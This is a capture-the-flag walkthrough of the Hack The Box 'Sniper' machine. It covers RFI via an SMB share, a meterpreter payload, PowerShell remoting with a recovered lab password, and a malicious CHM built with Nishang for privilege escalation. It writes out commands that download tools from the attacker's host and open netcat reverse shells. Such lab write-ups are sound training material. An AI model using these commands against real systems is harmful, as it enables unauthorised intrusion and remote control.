If you are interested in penetration testing or want to improve your ethical hacking skills, Hack The Box’s Sniper Virtual Machine is a great challenge for you. In this article, we will take a detailed look at the entire process, from the Recon phase to escalating privileges to the admin level.
Continuing the publication of solutions to problems submitted for development from the HackTheBox platform. This material may be useful for those who seek to develop in the field of information security. The article discusses the exploitation of RFI, bypassing the meterpreter shell blocking and creating a malicious CHM document.
Connection to the laboratory is via VPN. It is recommended to avoid using a work computer or devices with important data, since the connection is to a private network where experienced information security specialists are located.
This machine has the IP address 10.10.10.151, which we add to /etc/hosts.
10.10.10.151 sniper.htb
masscan -e tun0 -p1-65535,U:1-65535 10.10.10.151 --rate=1000
Now, to get more detailed information about the services running on the ports, let’s run the scan with the -A option.
nmap -A sniper.htb -p80,135,139,445
There are 4 ports open on the host, let’s find out what the web server can give us.
The first three links are empty, but the other two led to the blog and authorization pages.
The assumption was confirmed — LFI (Local File Inclusion) was detected.
In addition, there is a chance to test the possibility of using RFI (Remote File Inclusion). To do this, a test file is created that will be used for further research into the vulnerability.
To deploy a local SAMBA SMB server, you need to make the appropriate configurations to the /etc/samba/smb.conf file. In the configuration, you need to specify the path to the desired directory and grant permissions for access on behalf of the guest.
Start the smbd service.
service smbd start
And by turning to the resource, we will get a positive result.
Now we’re going to throw in the load. We’ll create it using msfvenom, then activate the listener.
We access the file. And we get a connection.
Since the site has an authorization page, there is a possibility to find at least some credentials. The current location is the blog page directory.
We download everything that is in the user directory.
While browsing all files on the local host, database connection credentials were discovered.
To determine the users on the system, the appropriate commands were attempted. However, when executing any command through meterpreter, the connection is interrupted. This may indicate that the cmd command processor is blocked, in particular the (-a) parameter.
execute -f powershell -a "net users" -i -H
Now let’s try to execute the command in the context of this user. To do this, we will pass the following script to powershell as a parameter.
execute -f powershell -a "$username = 'SNIPER\Chris' ; $password = '36mEAhz/B8xQ~2VM' ; $securePassword = ConvertTo-SecureString $password -AsPlainText -Force ; $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword ; Invoke-command -computername SNIPER -credential $credential -scriptblock { whoami }" -i -H
Let’s download netcat to the host. To do this, we’ll start an HTTP server in the directory with it.
python3 -m http.server 80
Let’s download.
execute -f powershell -a "$username = 'SNIPER\Chris' ; $password = '36mEAhz/B8xQ~2VM' ; $securePassword = ConvertTo-SecureString $password -AsPlainText -Force ; $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword ; Invoke-command -computername SNIPER -credential $credential -scriptblock { iwr 10.10.15.55/nc -o C:\\Users\\Chris\\Documents\\nc.exe }" -i -H
Now we run netcat, connect, and get a user session.
execute -f powershell -a "$username = 'SNIPER\Chris' ; $password = '36mEAhz/B8xQ~2VM' ; $securePassword = ConvertTo-SecureString $password -AsPlainText -Force ; $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword ; Invoke-command -computername SNIPER -credential $credential -scriptblock { C:\\Users\\Chris\\Documents\\nc.exe -e powershell 10.10.15.55 6543}" -i -H
After some searching through the directories, a file in CHM format was discovered. Its purpose remains unclear at this stage.
A note was found in the Docs folder on drive C: stating that the user has no PHP skills and should prepare documentation. The documents should be left in the same folder.
To create a malicious CHM file, HTML Help Workshop is first installed, and then the Out-Chm utility from the Nishang package is used to generate the required file.
Out-CHM -Payload "C:\\Users\\Chris\\Documents\\nc.exe -e powershell 10.10.15.55 8765" -HHCPath "C:\Program Files (x86)\HTML Help Workshop"
Saving the created file to the target directory on the remote host completes successfully.
wget http://10.10.15.55/doc.chm -o C:\Docs\doc.chm
The result is a session with administrator rights.
The article describes the Sniper VM walkthrough on the Hack The Box platform, including the detection and exploitation of LFI and RFI vulnerabilities, bypassing shell blocking, and creating a malicious CHM file for privilege escalation. The article emphasizes the importance of properly securing servers, configuring file access, and verifying the security of web applications.